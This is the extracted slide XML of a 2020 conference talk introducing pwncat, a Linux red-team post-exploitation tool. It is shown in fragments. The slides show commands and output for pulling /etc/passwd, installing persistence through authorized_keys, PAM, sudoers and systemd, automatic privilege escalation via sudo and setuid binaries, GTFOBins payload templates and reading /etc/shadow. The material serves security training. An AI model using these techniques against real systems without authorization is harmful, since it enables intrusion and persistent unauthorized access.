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 Condense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Condensed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Condensed-italic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoCondense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Condensed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 starts the talk and introduction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b25c1fc7a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b25c1fc7a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 discusses upload and download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all the different methods happening in the background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b25c1fc7a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b25c1fc7a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discusses persistence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b3c96099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b3c96099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 discusses tamper rationale and usage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bffda1a4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bffda1a4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discusses rationale for busybox and its use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b25c1fc7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b25c1fc7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 discusses enumeration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b25c1fc7a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b25c1fc7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discusses privesc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b3c96099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b3c96099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discusses privesc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bffda1a4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bffda1a4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discusses GTFObins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bffda1a4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bffda1a4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 discusses victim usage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bffda1a41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bffda1a41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 discusses cross-compiling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ac90d172f_0_1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ac90d172f_0_1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 starts, John takes his intro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bffda1a4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bffda1a4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 discusses enumerate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bffda1a41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bffda1a4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 discusses database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bffda1a4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bffda1a4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discusses use cases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bffda1a4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bffda1a4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discusses what next can we do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bffda1a4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bffda1a4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 wraps up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bffda1a4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bffda1a4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takes contact info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bffda1a4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bffda1a4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wraps up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bffda1a4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bffda1a4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RECORDING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ac90d172f_0_1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ac90d172f_0_1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covers agenda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c90d18d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c90d18d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covers naming conflicts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ac90d18d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ac90d18d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 discusses what pwncat is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ac90d18d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ac90d18d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discusses rationale on why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25c1fc7a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25c1fc7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 discusses how to use pwncat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bffda1a4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bffda1a4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 discusses how to use pwncat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mention change from prefix commands, to copy SSH ~C, to now Ctrl+D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bffda1a4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bffda1a4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takes configuration file slide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hyperlink" Target="https://discord.gg/Kgtnfw4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:johnhammond010@gmail.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/calebstewart/pwncat" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtube.com/johnhammond010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CalebStewart" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/CalebJStewart" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linkedin.com/in/johnhammond010" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pwncat.readthedocs.io" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/calebjstewart/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:caleb.stewart94@gmail.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JohnHammond" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/JohnHammond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alebStewart/pwnca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calebstewart/pwncat" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cytopia/pwncat" TargetMode="External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29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Introducing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1" lang="en" sz="8000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pwncat</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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38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Automating Linux Red Team Operations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510525"/>
            <a:ext cx="85206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Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Caleb Stewart</a:t>
            </a:r>
            <a:endParaRPr sz="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Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>John Hammond</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="800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>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>GRIMMCon</a:t>
            </a:r>
            <a:endParaRPr sz="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Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>July 15th, 2020</a:t>
            </a:r>
            <a:endParaRPr sz="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86375"/>
            <a:ext cx="71394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Easily upload a file to the victim host (with local and remote tab completion)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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(up|down)load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--help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637275"/>
            <a:ext cx="6526500" cy="8832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(local)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pwncat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upload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/etc/hosts /tmp/hosts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  /tmp/hosts</a:t>
            </a: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━━━━━━━━━━━━━</a:t>
            </a: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100.0%</a:t>
            </a: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•</a:t>
            </a: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622/622 bytes</a:t>
            </a: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•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• </a:t>
            </a:r>
            <a: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0:00:00</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="76A5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 [11:45:17]</a:t>
            </a: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uploaded </a:t>
            </a:r>
            <a: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622.00B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" sz="1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0.27 seconds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4619475" y="445025"/>
            <a:ext cx="4260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File upload/download</a:t>
            </a:r>
            <a:endParaRPr i="1"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2809075"/>
            <a:ext cx="42603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Download files just as easily</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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3259975"/>
            <a:ext cx="6526500" cy="9522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(local)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pwncat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/etc/passwd ./passwd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  /etc/passwd</a:t>
            </a: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━━━━━━━━━━━━━━━</a:t>
            </a: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100.0%</a:t>
            </a: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•</a:t>
            </a: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1.6/1.6 KB</a:t>
            </a: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•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• </a:t>
            </a:r>
            <a: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0:00:00</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="76A5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 [11:49:05]</a:t>
            </a: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downloaded </a:t>
            </a:r>
            <a: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1.59KiB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" sz="1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0.27 seconds</a:t>
            </a:r>
            <a:endParaRPr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86375"/>
            <a:ext cx="42603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Easily install persistence on the target host</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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persist --help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637275"/>
            <a:ext cx="5325600" cy="4509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(local)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pwncat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persist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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--install -m</a:t>
            </a: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authorized_keys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23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Automated Persistence Management</a:t>
            </a:r>
            <a:endParaRPr i="1"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2309875"/>
            <a:ext cx="42603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List installed persistence methods</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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2760775"/>
            <a:ext cx="5325600" cy="6504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(local)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pwncat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persist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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--status</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFF2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4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authorized_keys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" sz="1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victim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local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installed</a:t>
            </a:r>
            <a:endParaRPr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3620875"/>
            <a:ext cx="42603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Remove installed persistence</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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4071775"/>
            <a:ext cx="5325600" cy="6504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Remove all persistence methods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(local)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pwncat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persist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--clean</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFF2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6359275" y="2005075"/>
            <a:ext cx="2368200" cy="31383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Currently supported </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="1"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1"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persistence mechanisms:</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="13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PAM degradation attack</a:t>
            </a:r>
            <a:b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SSH authorized_keys</a:t>
            </a:r>
            <a:b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3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user password change</a:t>
            </a:r>
            <a:b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3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/etc/sudoers stomp</a:t>
            </a:r>
            <a:endParaRPr sz="13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.bashrc manipulation</a:t>
            </a:r>
            <a:b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3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systemd service</a:t>
            </a:r>
            <a:endParaRPr sz="13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186375"/>
            <a:ext cx="42603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View modifications to the remote system</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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tamper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--help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637275"/>
            <a:ext cx="6323700" cy="12732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(local)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pwncat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tamper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Modified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/home/victim/.ssh/authorized_keys</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="76A5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- Persistence: </a:t>
            </a:r>
            <a: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authorized_keys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" sz="1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victim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local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Created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file </a:t>
            </a:r>
            <a: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/var/log/firstlog</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="76A5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- Persistence: </a:t>
            </a:r>
            <a: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pam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local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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Track changes on the target</a:t>
            </a:r>
            <a:endParaRPr i="1"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3088375"/>
            <a:ext cx="42603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Quickly revert changes to original state</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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3539275"/>
            <a:ext cx="6323700" cy="572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(local)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pwncat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tamper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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--revert --all</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFF2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reverting • complet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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━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100.0%</a:t>
            </a:r>
            <a:endParaRPr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186375"/>
            <a:ext cx="68892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Automatically install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busybox</a:t>
            </a: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according to remote architecture</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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busybox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--help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87900" y="1713475"/>
            <a:ext cx="8241300" cy="986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(local)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pwncat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busybox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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--install</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFF2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uploading busybox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━━━━━━━━━━━━━━━━━━━━━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100.0%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•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1.0/1.0 MB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•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1.0 MB/s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•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0:00:00</a:t>
            </a:r>
            <a:endParaRPr sz="14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[11:18:55]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uploaded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busybox to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/tmp/busyboxuei0k</a:t>
            </a:r>
            <a:endParaRPr sz="14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[11:18:57]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busybox installed w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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391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applets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     </a:t>
            </a:r>
            <a:endParaRPr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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Need more commands?</a:t>
            </a:r>
            <a:endParaRPr i="1"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504750" y="2928775"/>
            <a:ext cx="5937600" cy="1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After installation,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pwncat</a:t>
            </a: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will utilize the binaries provided by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busybox</a:t>
            </a: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for future interactions with the remote host where possible.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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186375"/>
            <a:ext cx="42603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Easily enumerate useful information</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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enum --help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637275"/>
            <a:ext cx="6652500" cy="11649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(local)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pwncat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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--show --type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sudo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SUDO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Facts by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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sudo</a:t>
            </a:r>
            <a:endParaRPr sz="14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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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victim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/usr/bin/vim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" sz="14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developer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on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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local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NOPASSWD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(local)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pwncat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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Automated host enumeration</a:t>
            </a:r>
            <a:endParaRPr i="1"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3011575"/>
            <a:ext cx="42603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Generate enumeration report in Markdown</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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3462475"/>
            <a:ext cx="6652500" cy="8565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(local)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pwncat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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>--report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enumeration.md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[14:37:47]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enumeration report written to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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enumeration.md</a:t>
            </a:r>
            <a:endParaRPr sz="14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1186375"/>
            <a:ext cx="42603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Quickly enumerate low-level privesc methods</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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privesc --help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1637275"/>
            <a:ext cx="7064100" cy="12789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(local)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pwncat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privesc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-l</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFE5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shell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developer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via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/usr/bin/vim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sudo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NOPASSWD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developer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via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/usr/bin/vim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sudo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NOPASSWD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developer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via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/usr/bin/vim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sudo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NOPASSWD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(local)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pwncat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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Seek privilege escalation paths</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="3834325"/>
            <a:ext cx="67767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Based upon “live-off-the-land” resources,  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determine </a:t>
            </a:r>
            <a:r>
              <a:rPr i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capabilities</a:t>
            </a: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that can be taken advantage of.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0" y="3161275"/>
            <a:ext cx="9144000" cy="4158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	sudo			screen4.5.0 		dirtycow 		su 		setuid  		passwd</a:t>
            </a:r>
            <a:endParaRPr i="1"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privesc --escalate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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Automatic</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"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privilege escalation</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1690675"/>
            <a:ext cx="6546300" cy="20958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(local)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pwncat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privesc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2CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>-e -u sysadmin</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFF2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[17:32:35]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privilege escalation succeeded using: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	  ⮡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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shell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developer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via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/usr/bin/vim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sudo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NOPASSWD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     ⮡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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shell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sysadmin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via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/home/john/find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setuid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	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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warning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 euid/uid mismatch - attempting automated fix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[17:32:40]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euid/uid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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corrected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via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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authorized_keys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[17:32:41]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pwncat is ready 🐈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(remote)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sysadmin@target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400">
                <a:solidFill>
                  <a:srgbClr val="D0E0E3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>~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$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11700" y="3834325"/>
            <a:ext cx="67767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pwncat can also automatically detect and fix mismatched EUID and UID after an attempted privilege escalation!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311700" y="1186375"/>
            <a:ext cx="42603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Escalate through multiple users</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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q gtfobins.json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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Abstract GTFOBins Python Module</a:t>
            </a:r>
            <a:endParaRPr i="1"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932700" y="1170125"/>
            <a:ext cx="3797700" cy="3774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"bash"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"type": "shell",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"stream": "print",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"suid": ["-p"]</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"type": "read",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"stream": "raw",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"payload": "{command}",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"args": ["-c", "'{cat} {lfile}'"],</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"suid": ["-p"]</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"type": "write",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"stream": "base64",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"payload": "{command}",</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"args": ["-c", "'{base64} -d &gt; {lfile}'"],</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"suid": ["-p"],</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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"exit": "{ctrl_d}{ctrl_d}"</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFE5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FE5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4927475" y="2160725"/>
            <a:ext cx="4016700" cy="19335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Find a suitable GTFObin</a:t>
            </a:r>
            <a:b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method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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(victim.gtfo.iter_methods(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Capability.READ,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Stream.ANY))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Create the command payload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payload, input_data, exit_cmd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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b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method.build(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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lfile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"/etc/passwd"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4883700" y="1338775"/>
            <a:ext cx="42603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Smartly determine live-off-the-land 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binaries to perform any primitive task</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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7" name="Google Shape;207;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="71000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="21266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1093925"/>
            <a:ext cx="875500" cy="404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at api/victim.rst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30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Abstracted Victim Interaction</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1186375"/>
            <a:ext cx="42603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Easily interact with the remote filesystem</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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442350" y="1637275"/>
            <a:ext cx="5650200" cy="14487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pwncat.victim.open(</a:t>
            </a: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/etc/passwd</a:t>
            </a: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rb</a:t>
            </a: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filp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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	for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en" sz="1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filp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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		print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(line)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Access.READ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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pwncat.victim.access(</a:t>
            </a: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"/etc/shadow"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"Hashes for everyone!"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311700" y="3164875"/>
            <a:ext cx="48843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Execute remote processes with access to stdio</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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442350" y="3615775"/>
            <a:ext cx="5650200" cy="12027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pwncat.victim.subprocess(</a:t>
            </a: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"getent group"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pipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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	for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" sz="1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pipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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		print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(group.decode(</a:t>
            </a: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).strip())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(pwncat.victim.run(</a:t>
            </a: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"whoami"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more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api/victim.rst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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Abstracted Victim Interaction</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1186375"/>
            <a:ext cx="42603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Compile code on the remote host</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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442350" y="1637275"/>
            <a:ext cx="6566400" cy="12123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remote_path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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pwncat.victim.compile(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"main.c"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"other.c"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14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cflags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"-static"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14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ldflags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"-lssl"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pwncat.victim.run(remote_path)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562275" y="2849575"/>
            <a:ext cx="49083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>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The compile method also accepts File-Like objects.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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311700" y="3979975"/>
            <a:ext cx="7064100" cy="3642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(local)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pwncat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set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cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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/usr/bin/gcc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311700" y="3529075"/>
            <a:ext cx="49083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Automatically utilize a cross-compiler if needed</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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$(whoarewe)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="19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Caleb Stewart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Day:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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	Lieutenant in U.S. Coast Guard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	Assigned to USCYBERCOM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Night:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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</a:t>
            </a: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CTF Player and Developer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	Open Source Contributor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John Hammond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Day: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	Cyber Training Developer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	Red Teamer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Night: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	CTF Player and Developer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	YouTube Content Creator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641600" y="445025"/>
            <a:ext cx="5238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bash: whoarewe: command not found</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="445025"/>
            <a:ext cx="460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at api/enumerate.rst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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Tracking enumeration facts</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1186375"/>
            <a:ext cx="52833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Locate potential kernel exploits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432050" y="1637275"/>
            <a:ext cx="7540500" cy="8214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fact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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pwncat.victim.enumerate(</a:t>
            </a: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"system.kernel.exploit"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Also exposes data.url, data.versions, data.name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print(f</a:t>
            </a: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"Possibly vulnerable to {fact.data.cve}"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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2647975"/>
            <a:ext cx="52833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Enumerate and parse sudo privileges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432000" y="3098875"/>
            <a:ext cx="7540500" cy="12234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fact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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pwncat.victim.enumerate(</a:t>
            </a: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"sudo"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Also exposes group, host, runas_group, options, and hash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pec = fact.data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spec.matched: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print(f</a:t>
            </a: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"{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spec.user</a:t>
            </a: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} can run {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spec.command</a:t>
            </a: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} as {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spec.runas_user</a:t>
            </a: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}"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0" y="4486175"/>
            <a:ext cx="9144000" cy="4158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selinux    systemd    services    network    config files    SUID files    Capabilities</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="445025"/>
            <a:ext cx="460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cat api/database.rst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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Maintain state between sessions</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1186375"/>
            <a:ext cx="75141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pwncat</a:t>
            </a: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tracks hosts by a custom host identifier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421775" y="1623475"/>
            <a:ext cx="7404000" cy="1443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self.host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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self.session.query(pwncat.db.Host) </a:t>
            </a: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.filter_by(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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host_hash).first()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self.host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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None: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progress.log(f</a:t>
            </a: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"new host w/ hash [cyan]{host_hash}[/cyan]"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Create a new host entry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self.host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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pwncat.db.Host(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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host_hash)</a:t>
            </a:r>
            <a:endParaRPr sz="1400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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3142675"/>
            <a:ext cx="75141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pwncat</a:t>
            </a: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remembers previous sessions and can automatically reconnect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311700" y="3579775"/>
            <a:ext cx="7514100" cy="12789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pwncat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-C pwncatrc -r -H 10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr sz="14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reconnecting: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authorized_keys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victim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local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40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━━━━━━━━━━━━━━━━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100.0%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[11:13:07]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pwncat running in </a:t>
            </a:r>
            <a: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/bin/bash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pwncat is ready 🐈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(remote)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victim@target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400">
                <a:solidFill>
                  <a:srgbClr val="D0E0E3"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>~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$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311700" y="445025"/>
            <a:ext cx="460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continue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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4619475" y="445025"/>
            <a:ext cx="4260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Where is this useful?</a:t>
            </a:r>
            <a:endParaRPr i="1"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311700" y="1186375"/>
            <a:ext cx="66423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We have tested mainly on wargames and training platforms</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" u="sng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7" name="Google Shape;257;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="2329375"/>
            <a:ext cx="7755300" cy="23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Daily Bugle - Privilege Escalation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with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sudo yum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Madness - Privilege Escalation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with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screen4.5 CVE-2017-5618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EasyCTF - Privilege Escalation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with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vim SUID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Tomghost - Privilege Escalation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with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sudo zip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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"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… and more</a:t>
            </a:r>
            <a:endParaRPr i="1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0" y="1742975"/>
            <a:ext cx="9144000" cy="495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TryHackMe</a:t>
            </a:r>
            <a:endParaRPr sz="1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311700" y="445025"/>
            <a:ext cx="460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cat TODO.md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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
